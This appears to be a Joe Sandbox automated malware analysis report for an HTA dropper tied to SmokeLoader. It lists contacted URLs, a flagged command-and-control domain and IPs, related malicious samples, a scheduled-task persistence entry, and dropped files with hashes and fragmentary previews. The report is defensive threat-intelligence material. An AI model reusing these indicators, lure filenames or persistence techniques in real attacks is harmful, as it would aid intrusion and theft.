https://android.notify.windows.com/iOS	explorer.exe, 0000000E.00000003.2162007420.000000000D1F9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0	explorer.exe, 00000013.00000002.2014590049.0000000002D4D000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/a	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://prolinice.ga/;	explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://prolinice.ga/index.phpMozilla/5.0	explorer.exe, 00000013.00000002.2014590049.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.1995400275.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.1997904056.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2535368092.0000000002D67000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2112839505.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2535747935.0000000002CF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2535507694.0000000000450000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2536095977.0000000002AB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2535527789.0000000000C09000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://api.msn.com/$	explorer.exe, 0000000E.00000000.1754609723.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.245.135.166	unknown	United States	36352	AS-COLOCROSSINGUS	false
142.250.186.78	drive.google.com	United States	15169	GOOGLEUS	false
142.250.185.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
45.91.8.152	prolinice.ga	Russian Federation	208626	SERV-TECHRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1539853
Start date and time:	2024-10-23 08:13:42 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	veryeasythingsevermadeforcreatenewthignsbetterthigns.hta
Detection:	MAL
Classification:	mal100.bank.troj.spyw.expl.evad.winHTA@42/37@3/4
EGA Information:	Successful, ratio: 70.6%
HCA Information:	Successful, ratio: 98% Number of executed functions: 176 Number of non-executed functions: 85
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 7744 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 6128 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7848 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7988 because it is empty
Execution Graph export aborted for target wihaduv, PID 1556 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:14:37	API Interceptor	224x Sleep call for process: powershell.exe modified
02:15:37	API Interceptor	2263x Sleep call for process: explorer.exe modified
02:15:58	API Interceptor	1x Sleep call for process: WerFault.exe modified
08:15:40	Task Scheduler	Run new task: Firefox Default Browser Agent AE69D5B144DD2D95 path: C:\Users\user\AppData\Roaming\wihaduv

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
prolinice.ga	SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf	Get hash	malicious	SmokeLoader	Browse	185.251.91.119
	40830001.xls	Get hash	malicious	SmokeLoader	Browse	185.251.91.119
	#20240627_Edlen_B.xls	Get hash	malicious	SmokeLoader	Browse	77.232.129.190
	171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe	Get hash	malicious	SmokeLoader	Browse	77.232.129.190
	#20240627_Edlen_A.xls	Get hash	malicious	SmokeLoader	Browse	77.232.129.190

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SERV-TECHRU	tx6lJfVP3c.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Xmrig, zgRAT	Browse	45.91.8.197
	dFagySOU5B.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Xmrig, zgRAT	Browse	45.91.8.197
	aXCZLdgtmG.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Xmrig, zgRAT	Browse	45.91.8.197
	J7KkkQ9RRb.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Xmrig, zgRAT	Browse	45.91.8.197
	code9.exe	Get hash	malicious	DanaBot	Browse	45.8.157.91
	code9.exe	Get hash	malicious	DanaBot	Browse	45.8.157.91
	setup.exe	Get hash	malicious	SmokeLoader	Browse	45.91.8.184
	file.exe	Get hash	malicious	Tofsee	Browse	45.91.8.224
	file.exe	Get hash	malicious	Tofsee	Browse	45.91.8.224
	file.exe	Get hash	malicious	Tofsee	Browse	45.91.8.224
AS-COLOCROSSINGUS	seethemagicalpersoninmylifewithherlifegoodforme.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	172.245.123.45
	seethefirstthingstobeinentirethingstobegoodfro.hta	Get hash	malicious	Cobalt Strike	Browse	172.245.123.34
	niceworkingwithgreatthingstobeonlineforgoodthing.hta	Get hash	malicious	Cobalt Strike, AgentTesla, PureLog Stealer	Browse	192.3.101.157
	creambungoodforyourchoicetogetmeback.hta	Get hash	malicious	Cobalt Strike	Browse	107.175.229.138
	logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141
	createdbestthingswithnewthingsgreatattitudewithnewthignsonherewithme.hta	Get hash	malicious	Cobalt Strike	Browse	192.210.215.8
	ugetsharpresultsalwaysfromthegreatfileworksure.hta	Get hash	malicious	Cobalt Strike	Browse	198.144.178.173
	seethedifferentwithhereloverandreality.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.179.174
	greatwayforbestthignswithwhonotwanttodo.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141
	userhergoodthingswithmeforgetbestthingsgoodforme.hta	Get hash	malicious	Cobalt Strike	Browse	198.144.178.173

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	seethebestthingshavwithgreatthingsformetoget.hta	Get hash	malicious	Cobalt Strike	Browse	142.250.186.78 142.250.185.193
	greatworkwithnewthingstobegreatthignswithmehave.hta	Get hash	malicious	Cobalt Strike	Browse	142.250.186.78 142.250.185.193
	nicethingswithgreatthingsentirethingsgoodthingsgood.hta	Get hash	malicious	Cobalt Strike	Browse	142.250.186.78 142.250.185.193
	logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta	Get hash	malicious	Cobalt Strike	Browse	142.250.186.78 142.250.185.193
	createdbestthingswithnewthingsgreatattitudewithnewthignsonherewithme.hta	Get hash	malicious	Cobalt Strike	Browse	142.250.186.78 142.250.185.193
	seethedifferentwithhereloverandreality.hta	Get hash	malicious	Cobalt Strike	Browse	142.250.186.78 142.250.185.193
	greatwayforbestthignswithwhonotwanttodo.hta	Get hash	malicious	Cobalt Strike	Browse	142.250.186.78 142.250.185.193
	seethebestthingsformygirlshegreatfornewways.hta	Get hash	malicious	Cobalt Strike	Browse	142.250.186.78 142.250.185.193
	verynicegirlneedsuperkiisingfromtheboy.hta	Get hash	malicious	Cobalt Strike	Browse	142.250.186.78 142.250.185.193
	sheisthebestcaseeveryoneknowbesththignstobegreatfor.hta	Get hash	malicious	Cobalt Strike	Browse	142.250.186.78 142.250.185.193

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Roaming\wihaduv	MT_BURAAQ_FINAL_DRAFT_BL_RFQ32400909909_PDF.exe	Get hash	malicious	AgentTesla	Browse
C:\Users\user\AppData\Roaming\wihaduv	PAYMENT_SWIFT_REFHSBC029999018728929000187928311119281-PDF.exe	Get hash	malicious	AgentTesla	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_explorer.exe_f0a768defacff880d8626d1749fd6d847b83e1c3_07ad8ade_eb4ecc53-8d1a-4566-8315-db5a6648e01a\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9433601432116723
Encrypted:	false
SSDEEP:	192:bRT8qeC6KQ0LZTkrjyaVwzuiFAZ24lO8k:WjCvrLZTWjKzuiFAY4lO8k
MD5:	CE51F9FB446B713912BB5B8ECBE396AB
SHA1:	CF8EE46A45858B42CDA36DC313541D711BB2A66A
SHA-256:	B033DA5696FC10C83109691D973EC19FFBFEE6850347FFBC6DBDFD6F41007ABE
SHA-512:	BEE320529AA7154FD41DB10B03D6DA87E11486F37979AA2E515523D68F9D945997D875A3AF832794FF496A9C79103BFFC885E9FF915BC09A52463889A0586762
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.1.3.7.7.5.0.2.9.8.5.2.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.1.3.7.7.5.1.6.2.6.6.3.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.4.e.c.c.5.3.-.8.d.1.a.-.4.5.6.6.-.8.3.1.5.-.d.b.5.a.6.6.4.8.e.0.1.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.1.1.d.6.7.c.-.2.4.a.9.-.4.6.1.5.-.8.1.6.8.-.a.9.c.8.1.f.1.b.5.4.c.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.8.8.-.0.0.0.1.-.0.0.1.3.-.5.8.8.d.-.c.3.0.0.1.3.2.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DBD.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Oct 23 06:15:50 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	58886
Entropy (8bit):	1.5464975092081004
Encrypted:	false
SSDEEP:	192:t+tLysN67tO2pxdsNbnfr71fkTqmNyjQQmX:QtWs7ubshnfr7BVQj
MD5:	2BE9A9339F75CD29C43A95DE18159749
SHA1:	7318298EE6F1E1FF0EFE4B7BA9BA27EFAC5CF0B8
SHA-256:	3A7A4A6233DD7812EE1CDC539128D15D5CACDCAF2C29ABA66BD1B0CD60ABCCBE
SHA-512:	EDE151F967910FF7CD6A4248DDE84D17BD05A76BA4A399A3EC0F8207F3D6F71D07936F84D06CEA99B563D91896436C0A3BD07E0490880263C6F9ECD3D9DB201F
Malicious:	false
Preview:	MDMP..a..... ..........g.........................................7..........T.......8...........T...........0...............L...........8...............................................................................eJ..............Lw......................T..............g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E89.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8556
Entropy (8bit):	3.6926257815490358
Encrypted:	false
SSDEEP:	192:R6l7wVeJtTdW6YWUGgmfqtjbzpDT89bp69finDm:R6lXJ5c6YlGgmfqtj+pIfh
MD5:	CCFDAEEDAB24F3957343CBCB8C569806
SHA1:	AD2071752CDDD1F0CC75C04789F85942C13116BB
SHA-256:	0E184A57C10C2E81A46156D3E70BA3919B240BAAD8F634AEE00879CEE7537DD5
SHA-512:	86AB434B041CFEA709C8596FA53FE43531B18096036462927885B8161A9370B9B4B915588DD4DABE8C4806A04905EA3499056310CB00A25A11932DE2ED7AD98A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.3.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6ED8.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4719
Entropy (8bit):	4.454646200250732
Encrypted:	false
SSDEEP:	48:cvIwWl8zs+NJg771I90/WpW8VYFYm8M4JYcFyyq85Mcnb9Q3fd:uIjf+nI77u7VBJqonba3fd
MD5:	98702988ED4C9910CDDB249C17BB2005
SHA1:	565E53E74B96D4912DA50542ADBEABFE908C12F8
SHA-256:	70FF2052FCD69AF50B9E58928BC278FA0221BA563A6F517DF7419268B81EACF7
SHA-512:	FBC3388DF543B41617F4296391E9DD862230C0F769BFBF4CE30BA50A92E1C25BDA52F579AE3DABF3AE48C4D00E830203682970485CF2C9EE3B6F6C9AAA09E9AA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="555678" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wihaduv.log

Download File

Process:	C:\Users\user\AppData\Roaming\wihaduv
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	311
Entropy (8bit):	5.347482639021185
Encrypted:	false
SSDEEP:	6:Q3La/xwchA2DLIP12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hhpDLI4M9tDLI4MWuPTAv
MD5:	1AC8524D3800CDD5A91A864BCD4C3AB5
SHA1:	D003AEE44AC954938CE83E4A80412E04F726EA83
SHA-256:	8652A0399D65C2D111841F66EF2E930CDB8291CC8203252D59FD4921FF336C02
SHA-512:	9F28B59B99D0BC1EB60D29BE54CE2DAAC7D9B5D895311169578383C19A46CCF7CDE498EB6D7F172CF7D1D11E5B16665DF989CD8EEC527282BE3B796CD08C7DAC
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\seethebestthingsentiretimewithgreatthignstoebe[1].tiff

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	140570
Entropy (8bit):	3.699365257334415
Encrypted:	false
SSDEEP:	1536:WSb0qgt5pzFGwNHijRyr0eoTozYA5qx8QeT/nJuMW2BZSp4FDIKF4Gc1IIzZWlTh:WSbNgt5pJGwNXTvclvrcZ5JIC6Vo+0
MD5:	F55A3D376DF4C84C27AC8B6337BAEAE0
SHA1:	5EA1BD3BE84FC46CC8C9741DEE373E409774CE3B
SHA-256:	65EE64591DE8A3926EB0EF9B6C668BFF0A5CCE93F0574E9D6133690BBD1FC632
SHA-512:	36000CC27AB85878F093536CD4775B7A1915A24F5733905F5D2EE1441BDD3B33E0D0B35A5F7B0E4BC9F1060BBE2D2A396663B88FF9A116E0DA1DF734BF0E689A
Malicious:	false
Preview:	..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .m.a.s.c.u.l.i.n.i.d.a.d.e.)..... . . . .d.i.m. .h.y.p.o.g.l.o.s.s.a.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .h.y.p.o.g.l.o.s.s.a..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .h.y.p.o.g.l.o.s.s.a.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.901113710259376
Encrypted:	false
SSDEEP:	96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5:	7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1:	22813AF893013D1CCCACC305523301BB90FF88D9
SHA-256:	5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512:	D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1628158735648508
Encrypted:	false
SSDEEP:	3:Nlllul7th:NllU
MD5:	A865C8C0025271AA63FA51C6E19FBBEA
SHA1:	41EB53653764E1A27A96204556271CE69504DA75
SHA-256:	EC0DE7C97A7C5A3D4D04194415A953AE61443A91479BF194F807007375FD12FB
SHA-512:	993EE7693877C94D48C295BC67D56003A58C9577DBE72126B36E8CD6293D31AF63A5B96A185CC5564FC2C40B3A253D39A186D34E4B478AE7C1BD5A623EA624FC
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\566C.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\566C.tmp-shm

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\593C.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5A09.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
